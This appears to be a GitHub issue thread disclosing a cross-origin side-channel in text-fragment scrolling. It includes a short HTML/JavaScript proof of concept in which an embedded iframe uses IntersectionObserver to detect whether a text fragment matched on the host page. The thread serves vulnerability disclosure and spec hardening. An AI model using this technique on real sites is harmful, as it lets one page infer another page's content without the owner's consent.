Possible side-channel information leak using IntersectionObserver #79
Comments
|
@shhnjk your link no longer works, but I made a new PoC: https://software.hixie.ch/utilities/js/live-dom-viewer/saved/11657 <!DOCTYPE html>
<p style="margin-bottom: 150vh">x</p>
<p>Target text</p>
<iframe src="data:text/html,<body><pre></pre><script>var io = new IntersectionObserver(entries => {
document.body.firstChild.textContent = entries[0].isIntersecting ? 'Text fragment was scrolled to' : 'No scrolling observed';
io.unobserve(document.body);
});
io.observe(document.body)</script>"></iframe>
<p style="margin-bottom: 150vh">x</p>
<script>
location.hash = "#:~:text=Target%20text";
</script> |
|
The iframe could also use a lazy-loading image (which is implemented using IntersectionObserver). |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
If an attacker has an iframe embedded in the victim page, they can determine some information from the victim page across origins. Using an intersection observer, the attacker can determine if the iframe intersects the viewport and use that to guess whether a followed link resolved to the text fragment.
The text was updated successfully, but these errors were encountered: